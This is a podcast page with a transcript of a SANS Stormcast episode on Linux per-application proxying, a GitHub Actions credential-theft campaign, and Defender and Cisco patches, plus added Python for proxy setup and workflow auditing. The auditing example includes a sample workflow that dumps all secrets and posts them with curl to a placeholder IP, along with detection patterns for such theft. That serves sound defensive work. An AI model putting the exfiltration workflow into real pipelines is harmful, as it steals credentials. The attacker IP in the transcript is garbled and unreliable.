
SANS Stormcast Friday, May 22nd, 2026: Selective HTTP Proxying; More GitHub Repo Trouble; MSFT Defender Patches;
Hello and welcome to the Friday, May 22, 2026 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Jacksonville, Florida. This episode is brought to you by the SANS.edu Graduate Certificate Program in Cybersecurity Engineering.

Last week, Rob wrote a diary about a tool called Proxifier. Proxifier is neat because it allows you to intercept traffic with a proxy from specific applications. Of course, that's great for reverse analysis and such. Yes, you could just proxy all traffic, but then of course you have to deal with all the noise that you're getting in addition to the traffic from the application you're interested in. The trick here is that Proxifier only works on Macs and on Windows. Yes, there is sort of an Android version, but no sort of generic Linux version. So I looked into, well, how do you do it in Linux? And as far as I know there are really sort of three different ways of doing it. Number one, you can set the specific environment variables http_proxy and https_proxy. Many sort of HTTP libraries are looking for these environment variables and will use any proxy. So before starting the application you just set these environment variables. You can do it a little bit with iptables, but with iptables you're kind of only able to redirect traffic from a particular user. So you have to make sure that this application, well, is the only application being run by a particular user. And then I think sort of the neatest and often overlooked feature in Linux is network namespaces, where you can define essentially sort of a custom network configuration for a particular application. And you essentially do this by defining which network interfaces and then also like custom routing tables and so on are being used in this namespace. And then you assign that namespace to the application or the application to the namespace, and then the application basically sees a different network environment than the rest of the system. And that again allows you to selectively intercept traffic that emerges from this namespace or basically, in this case, from this application. So yes, you can do it in Linux. Not sure if the Android version of Proxifier can somehow be used in Linux, but that may be probably the easiest solution if that is possible.

Well, in case you thought that, well, today he's not going to talk about any supply chain issues again, sorry, still have to do it. We have another big attack against GitHub repositories, this time not against GitHub itself, but against users of GitHub. Apparently this attack is using harvested credentials from prior attacks in order to infiltrate specific repositories. Something like 5,000 different repositories have so far been affected. SafeDep.io has published a good blog post, and I think they're the ones who originally came across this attack. In order to actually exfiltrate credentials, well, it basically adds GitHub Actions, and these GitHub Actions, they have a couple of different ways sort of to trigger them, some on each push and pull. So basically these are fairly noisy GitHub Actions, but then you also have some more stealthy ones that can be triggered externally. And once, well, you're affected by these, you will basically lose all of your environment variables, your AWS credentials, your Google credentials, your SSH private keys, any kind of API keys, database connection strings, JWTs, PEM private keys, cloud tokens. Well, pretty much everything sort of secret on your system. The data is then being exfiltrated to an IP address, 216-12-622, 5129. And well, the author actually is pretty good in sort of disguising themselves by using names like Auto CI or CI Bot or Pipeline Bot, essentially names that kind of fit in with a CI/CD pipeline.

Microsoft released an update for its Windows antivirus platform, fixing the recent privilege escalation vulnerabilities that have already been exploited. Redsun and Undefend are the names for these two. There is nothing really that you have to do as a user. This is an update to the antivirus platform and it's regularly updated, just like the rules being used by Windows Defender, so it should automatically be already installed on your system. This is not one of those Patch Tuesday updates.

Cisco released some updates today. One interesting one affects the Cisco Secure Workload. Well, this is a system that essentially allows you to essentially sort of sandbox critical and possibly dangerous or vulnerable payloads. What better way to do it than use a vulnerable system like Secure Workload in order to accomplish this? Apparently Secure Workload has an authentication bypass vulnerability in the REST API, allowing an unauthorized user to get site admin access. This is a complete 10 on the CVSS scale, so definitely something that you probably want to address, in particular if that REST API that controls Cisco's Secure Workload is somewhat exposed.

Well, and this is it for today, so thanks for listening, thanks for liking, thanks for subscribing also to this podcast, and if you have any questions please email me, or if you have any feedback please let me know. The next podcast will be on Tuesday because Monday is the Memorial Day holiday here in the US, so we'll skip Monday. So talk to you again on Tuesday. Bye.
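The three Linux approaches described in the episode (proxy environment variables, an iptables owner match, and a dedicated network namespace), as an added example that is not part of the podcast or of Proxifier. The proxy URL, namespace name, interface names and 10.200.0.0/24 addresses are assumptions; the `ip` and `iptables` command strings are generated rather than executed because they require root.

```python
import os
import shlex
import subprocess

PROXY = "http://127.0.0.1:8080"  # assumed local intercepting proxy listener


def proxy_env(proxy_url, base_env=None):
    """Method 1: the http_proxy/https_proxy variables most HTTP client libraries honour.
    Both spellings are set because tools differ on which one they read."""
    env = dict(os.environ if base_env is None else base_env)
    for var in ("http_proxy", "https_proxy"):
        env[var] = env[var.upper()] = proxy_url
    env["no_proxy"] = env["NO_PROXY"] = "localhost,127.0.0.1"
    return env


def run_with_proxy(argv, proxy_url=PROXY):
    """Launch a single application with the proxy variables set; nothing else is affected."""
    return subprocess.run(list(argv), env=proxy_env(proxy_url), capture_output=True, text=True)


def owner_redirect_rules(uid, proxy_port=8080, ports=(80, 443)):
    """Method 2: iptables owner match. Only TCP traffic from processes running as `uid`
    is redirected to a local transparent proxy port, so the app must run as its own user."""
    return [f"iptables -t nat -A OUTPUT -m owner --uid-owner {uid} -p tcp --dport {p} "
            f"-j REDIRECT --to-ports {proxy_port}" for p in ports]


def netns_setup_commands(ns="appns", host_ip="10.200.0.1", app_ip="10.200.0.2", proxy_port=8080):
    """Method 3: a network namespace with its own veth link and a default route via the host
    side. Everything leaving the namespace crosses veth-host, where it can be redirected
    (the proxy must listen on host_ip or 0.0.0.0; DNS for the namespace is not configured here)."""
    return [
        f"ip netns add {ns}",
        "ip link add veth-host type veth peer name veth-app",
        f"ip link set veth-app netns {ns}",
        f"ip addr add {host_ip}/24 dev veth-host", "ip link set veth-host up",
        f"ip -n {ns} addr add {app_ip}/24 dev veth-app",
        f"ip -n {ns} link set veth-app up", f"ip -n {ns} link set lo up",
        f"ip -n {ns} route add default via {host_ip}",
        f"iptables -t nat -A PREROUTING -i veth-host -p tcp --dport 80 -j REDIRECT --to-ports {proxy_port}",
        f"iptables -t nat -A PREROUTING -i veth-host -p tcp --dport 443 -j REDIRECT --to-ports {proxy_port}",
    ]


def netns_exec(ns, argv):
    """Command line that runs the application inside the namespace (as root)."""
    return ["ip", "netns", "exec", ns, *argv]


if __name__ == "__main__":
    print(run_with_proxy(["sh", "-c", "echo $https_proxy"]).stdout.strip())
    print("\n".join(netns_setup_commands()))
    print(" ".join(shlex.quote(c) for c in netns_exec("appns", ["curl", "http://example.com/"])))
```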
Podcast: SANS Internet Storm Center Daily Cyber Security Podcast (Stormcast)
Host: Johannes B. Ullrich
Date: May 22, 2026
Main Theme:
This episode provides a concise roundup of current cybersecurity developments, focusing on selective HTTP proxying methods on various operating systems, a major ongoing GitHub supply chain attack, critical Microsoft Defender and Cisco Secure Workload patches, and practical defense recommendations.
[00:20 – 02:33]
Proxifier Tool (Windows/Mac):
Linux Alternatives:
Environment Variables (http_proxy, https_proxy):
iptables/User-based Proxying:
Network Namespaces:
Linux/Android Cross-compatibility:
[02:33 – 04:16]
Attack Overview:
Scope:
Attack Method:
Command & Control:
Evasion Tactics:
Reference:
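A defender-side check for the workflow pattern the episode describes (noisy push-triggered actions beside externally triggerable ones that dump secrets and ship them to a hard-coded IP), as an added example that is not part of the podcast or of SafeDep's write-up. The sample workflow texts are constructed, and mapping "triggered externally" to the `repository_dispatch`/`workflow_dispatch` events is this example's interpretation.

```python
import re

# Constructed sample workflows (not taken from the page) modelling the described behaviour.
SUSPICIOUS = """\
name: Auto CI
on:
  push:
  repository_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: |
          env > /tmp/e
          echo '${{ toJSON(secrets) }}' >> /tmp/e
          curl -s -X POST --data-binary @/tmp/e http://192.0.2.10/c
"""
BENIGN = """\
name: tests
on: [push, pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: make test
"""

# Events that can be fired from outside normal repository activity (assumed mapping).
EXTERNAL_TRIGGERS = {"repository_dispatch", "workflow_dispatch"}
CHECKS = {
    "secrets_dump": re.compile(r"toJSON\(\s*secrets\s*\)"),            # grabs every secret at once
    "env_dump": re.compile(r"(?m)(?:^|[;&|])\s*(?:env|printenv)\s*(?:>|\|)"),  # env written to file/pipe
    "upload_to_ip": re.compile(r"\b(?:curl|wget)\b[^\n]*https?://(?:\d{1,3}\.){3}\d{1,3}"),
}


def triggers(text):
    """Return event names under the top-level 'on:' key, inline or block form (YAML-lite)."""
    m = re.search(r"(?m)^on:[ \t]*(.*)$", text)
    if not m:
        return set()
    names = set(re.findall(r"[a-z_]+", m.group(1)))  # on: push  /  on: [push, pull_request]
    for line in text[m.end():].splitlines():
        if line.strip() and not line[0].isspace():
            break  # next top-level key ends the on: block
        key = re.match(r"^ {2}([a-z_]+):", line)  # two-space-indented event keys
        if key:
            names.add(key.group(1))
    return names


def audit_workflow(text):
    """Score one workflow: 'high' when it reaches for all secrets or posts to a bare IP literal."""
    trig = triggers(text)
    findings = [name for name, rx in CHECKS.items() if rx.search(text)]
    external = bool(trig & EXTERNAL_TRIGGERS)
    exfil = {"secrets_dump", "upload_to_ip"} & set(findings)
    severity = "high" if exfil else "medium" if (findings or external) else "low"
    return {"triggers": trig, "external_trigger": external, "findings": findings, "severity": severity}
```

Run it over every file under `.github/workflows/` of a repository you own, and treat any "high" result that was introduced by an unfamiliar committer name as an incident rather than a lint warning.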
[04:16 – 04:52]
Vulnerabilities:
Response:
[04:52 – 05:27]
On Linux Proxy Setup:
On Supply Chain Attacks:
On GitHub Secrets Theft:
On No Action Required for Microsoft Defender Users:
The episode is delivered in a concise, practical tone with a touch of dry humor ("sorry, still have to do it"), making advanced security topics approachable for industry practitioners. Johannes B. Ullrich provides actionable technical advice and pointed reminders about staying vigilant, especially relating to rapidly evolving supply chain threats.
This episode is a quick, high-density update for cybersecurity professionals, zeroing in on application-specific proxying techniques (especially for Linux), a rapidly spreading GitHub-based supply chain attack with far-reaching theft of secrets via compromised repository actions, and urgent patching news for core enterprise security products (Microsoft Defender and Cisco Secure Workload). If you manage repositories, use Linux tools, or operate enterprise workloads, the quick hits and practical mitigation tips are particularly timely.